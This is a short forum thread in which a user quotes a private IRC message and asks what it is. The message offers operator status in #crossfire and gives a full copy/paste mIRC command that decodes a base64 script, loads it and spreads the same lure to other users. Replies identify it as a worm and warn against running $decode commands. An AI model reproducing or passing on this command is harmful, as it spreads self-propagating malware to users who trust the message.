Random irc pm

Could any1 explain me wtf this is

Quote [22:35:28] [kanSs`nTd Do You Want to be an OPERATOR in #crossfire ? copy/paste this-> //write   $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpvaW4gfCAubXNnICRuaWNrIERvIFlvdSBXYW50IHRvIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID8gY29weS9wYXN0ZSB0aGlzLT4DMTQgLy93cml0ZSCgICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyCgICRjaHIoMTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs   | //mode $me +R
It's an irc worm, do it and you will spam the same shit.

never do any $decode shit
virus watch out mate
what hope said
Beter komt je is irc en gaan we 3v3 doen :(
leon best friend :)
free op dude
what shaky said
free op m8
what razzah said
what kartez said
what i said

oh wait
it makes ur penis double in size
Its a virus noob
too many spammers on #crossfire
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